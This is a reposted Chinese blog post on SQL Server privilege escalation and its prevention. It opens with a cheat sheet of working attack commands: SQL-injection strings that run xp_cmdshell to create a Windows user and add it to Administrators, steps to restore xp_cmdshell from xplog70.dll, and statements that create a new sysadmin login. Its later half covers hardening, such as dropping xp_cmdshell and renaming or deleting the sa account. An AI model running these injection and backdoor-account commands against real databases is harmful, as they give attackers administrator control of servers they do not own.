SQL Server 提升权限相关命令及防范

超、凢脫俗 2021-11-11 23:12 227阅读 0赞

SQL Server 提升权限相关命令及防范  
;exec master..xp\_cmdshell "net user name password /add"--  
;exec master..xp\_cmdshell "net localgroup administrators name /add"--  
  
程序代码开启cmdshell的SQL语句  
  
EXEC sp\_addextendedproc xp\_cmdshell ,@dllname ='xplog70.dll'  
  
判断存储扩展是否存在  
select count(\*) from master.dbo.sysobjects where xtype='X' and name='xp\_cmdshell'  
返回结果为1就OK  
  
恢复xp\_cmdshell  
Exec master.dbo.addextendedproc 'xp\_cmdshell','xplog70.dll';select count(\*) from master.dbo.sysobjects where xtype='X' and name='xp\_cmdshell'  
返回结果为1就OK  
  
否则上传xplog7.0.dll  
Exec master.dbo.addextendedproc 'xp\_cmdshell','C:/WinNt/System32/xplog70.dll'  
  
堵上cmdshell的SQL语句  
sp\_dropextendedproc "xp\_cmdshell"  
  
  
DOS:  
dir c:/  
dir d:/  
dir e:/  
  
net user TsInternetUsers Password /add  
net localGroup Administrators TsInternetUsers /add  
  
备份恢复IPSEC  
  
secedit /export /CFG c:/tmp.inf  
echo sedenynetworklogonright =>>c:/tmp.inf  
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf  
  
SQL:  
exec master..sp\_addlogin UserName,Password  
exec master..sp\_addsrvrolemember UserName,sysadmin  
  
  
sa帐号的改名和删除  
首先打开SQL中的企业管理器，接着在工具选项卡中选择SQL server配置属性依次，点服务器设置，看到允许对系统目录直接进行修改前面的方框吗，点一下，好。  
再打开查询分析器，登陆进去（呵呵，随便你用什么帐号进去，不过可一定要在master数据库中有db\_owner的权限）输入  
  
update sysxlogins set name='你要改成的名字' where sid=0x01  
update sysxlogins set sid=0xE765555BD44F054F89CD0076A06EA823 where name='你要改成的名字'  
  
OK，执行成功，好拉，转道企业管理器中刷新安全性中的登陆，看看，sa是不是变成xwq拉，呵呵，选中xwq点击右键，怎么样是不是出现拉删除的选项，呵呵，删除。看看sa是不是已经没有拉。  
  
  
后记  
  
直接在查询分析器里怎么删除sa  
  
直接在查询分析器里怎么删除sa，做法和前面所说的差不多，只不过这次不是在企业管理器中做手脚拉，而是利用sql提供给我们功能强大的存储过程来完成这项任务。下面就是我所说的需要利用的存储过程sp\_configure，sp\_configure显示或更改当前服务器的全局配置设置。  
它的语法:  
  
sp\_configure \[ \[ @configname = \] 'name' \]  
\[ , \[ @configvalue = \] 'value' \]  
  
实例：  
  
sp\_configure 'allow updates', 1  
go  
RECONFIGURE WITH OVERRIDE  
go  
  
好拉，这样我们就可以更新系统表拉，接下来和前面的做法一样拉 update sysxlogins set name='你要改成的名字' where sid=0x01，然后再删除"你改名后的那个名字"  
不过要注意在 sp\_configure 上没有参数（或只有第一个参数）的执行许可权限默认授予所有用户。有两个参数的 sp\_configure（用于更改配置选项）的执行许可权限默认授予 sysadmin 和 serveradmin 固定服务器角色。RECONFIGURE 权限默认授予 sysadmin 固定服务器角色和 serveradmin 固定服务器角色，并且不能传输。还得在master中是db\_owner。

转载于:https://www.cnblogs.com/Dicky/archive/2005/04/09/134904.html